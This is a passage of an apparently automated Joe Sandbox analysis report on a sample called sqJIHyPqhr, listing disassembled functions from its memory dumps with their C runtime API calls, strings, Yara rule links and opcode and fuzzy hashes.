Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024D239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024D25EC,00000001,00000001,?), ref: 024D23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024D25EC,00000001,00000001,?,?,?,?), ref: 024D247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024D2575
__freea.LIBCMT ref: 024D2582

Part of subcall function 024D390E: RtlAllocateHeap.NTDLL(00000000,024ADAD7,00000000), ref: 024D3940

__freea.LIBCMT ref: 024D258B
__freea.LIBCMT ref: 024D25B0

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: 772b3558f20e2a60af955ca66129888e15ec5cb1a7c5b650830d37b680444e98
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: 2451E372A00216ABDB25CF64CC70EBFB7AAEB44754F15466EFC04D6241DBB4DD41CA60

Function 024CE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 024CE445
__cftoe.LIBCMT ref: 024CE477

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: a4642f3a175eb6cd3e7c7215c4128652134d6baad2b701b7be03cbac48a5130a
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: D151FC39B00205ABDFA49F9DCC40B6F77A9EF48374F30416FE815D2281EB35D5018A68

Function 024C302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024C3051

Part of subcall function 024B8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024B8ABD

SafeSQueue.LIBCONCRT ref: 024C306A
Concurrency::location::_Assign.LIBCMT ref: 024C312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C314B
__CxxThrowException@8.LIBVCRUNTIME ref: 024C3159

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: ee18b791b93dfc6af765382100c0301b5c22d95bbb1e5c0fda464add2fc1a146
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: ED31D535A006119FCB65EF6AC844AAABBB5EF44720F20859ED8068B355DB70E945CFD0

Function 024C8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 024C8F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 024C8F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 024C8F97
PMDtoOffset.LIBCMT ref: 024C8FB6

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: 7aa818398363302f4dcc635e9df35b91275b6bd7adb8422c8734accd8e7ce0d2
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: 0721277A604208AFDF56DF6DD845AAE77A6EF45764B30821FE90293280E731E501CA94

Function 024A5437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 024A544B
__Mtx_init.LIBCPMT ref: 024A5471
std::_Cnd_initX.LIBCPMT ref: 024A5494
__Thrd_start.LIBCPMT ref: 024A54B9
std::_Cnd_waitX.LIBCPMT ref: 024A54D9
std::_Cnd_initX.LIBCPMT ref: 024A5506

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 903db547a3281466db16d92d1484d2e48002bd9fabe0bc15142089328111c5b1
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: C5218072C04208AADF15EBB9E860BDEB7F9AF28315F14401FE504B7280DB759A448F75

Function 024C9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024C9038,024C69C9,024E0907,00000008,024E0C6C,?,?,?,?,024C3CB2,?,?,0045A064), ref: 024C904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024C905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024C9076
SetLastError.KERNEL32(00000000,?,024C9038,024C69C9,024E0907,00000008,024E0C6C,?,?,?,?,024C3CB2,?,?,0045A064), ref: 024C90C8

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: dc05bd5aa21f5703b4d0da85884125c39283d82eb820003b445d9b149944b829
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3B01D83A2097217EA6A42BBF7C889772745EB05776B30033FE521453E5EF1288554D89

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,25439A21), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,25439A21), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 024A4FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 024A4FCA
int.LIBCPMT ref: 024A4FE1

Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE

std::locale::_Getfacet.LIBCPMT ref: 024A4FEA
std::_Facet_Register.LIBCPMT ref: 024A501B
std::_Lockit::~_Lockit.LIBCPMT ref: 024A5031
__CxxThrowException@8.LIBVCRUNTIME ref: 024A504F

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 3b9cd9609575d1334d102860065d3b3d44fd1909408e73f48122298cfe8b212e
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: CE11C231D042289BCB25EB65D961AEE7776BF24314F54011FE422AB2D0DB749A05CFD0

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 024AC3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 024AC401
int.LIBCPMT ref: 024AC418

Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE

std::locale::_Getfacet.LIBCPMT ref: 024AC421
std::_Facet_Register.LIBCPMT ref: 024AC452
std::_Lockit::~_Lockit.LIBCPMT ref: 024AC468
__CxxThrowException@8.LIBVCRUNTIME ref: 024AC486

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 20e1128c0867f5c62e9d78edd7923c1678400782dbfb64bd7c718edfca18cc91
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: BA11E1719002289BCF15EBA5C8A4AEE7B72AF64714F24011FE811BB2D0DF748A01CFA4

Function 024A4E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 024A4E8C
int.LIBCPMT ref: 024A4EA3

Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE

std::locale::_Getfacet.LIBCPMT ref: 024A4EAC
std::_Facet_Register.LIBCPMT ref: 024A4EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 024A4EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 024A4F11

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: cf759c499c4f0c228f308d2f18619557dc26861689fdf22d3f35e1acf6c2dded
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: C711AC319002299BCB15EBA5D860AEF7772AF64314F24011FE811A72D0DBB49A01CFA0

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

CorExitProcess, xrefs: 0042FF0F
mscoree.dll, xrefs: 0042FEFD

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024E08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024E08F8
make_shared.LIBCPMT ref: 024E0943

Strings

RCC, xrefs: 024E092A
v)D, xrefs: 024E08F3
MOC, xrefs: 024E091B

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: 7abdc0f25e0cdd37e78411f15ae8cdbdec104073270d2ba0228812cd8e135fe8
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 88F0C2B4A00214EFEF1AFF69C00066D3765BF61B01F46909BF4016B360CBB88988CFA1

Function 024CB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 3ae09daaeae43522914bdc4077791c9a9ffbc241102ee4553dc493e6e69faa0c
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: 5D71B239E002169BCB618F9DC886ABFBB75EF5531CF34426FE41157280DB708942CBA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 024D0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D390E: RtlAllocateHeap.NTDLL(00000000,024ADAD7,00000000), ref: 024D3940

_free.LIBCMT ref: 024D0DB6
_free.LIBCMT ref: 024D0DCD
_free.LIBCMT ref: 024D0DEC
_free.LIBCMT ref: 024D0E07
_free.LIBCMT ref: 024D0E1E

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
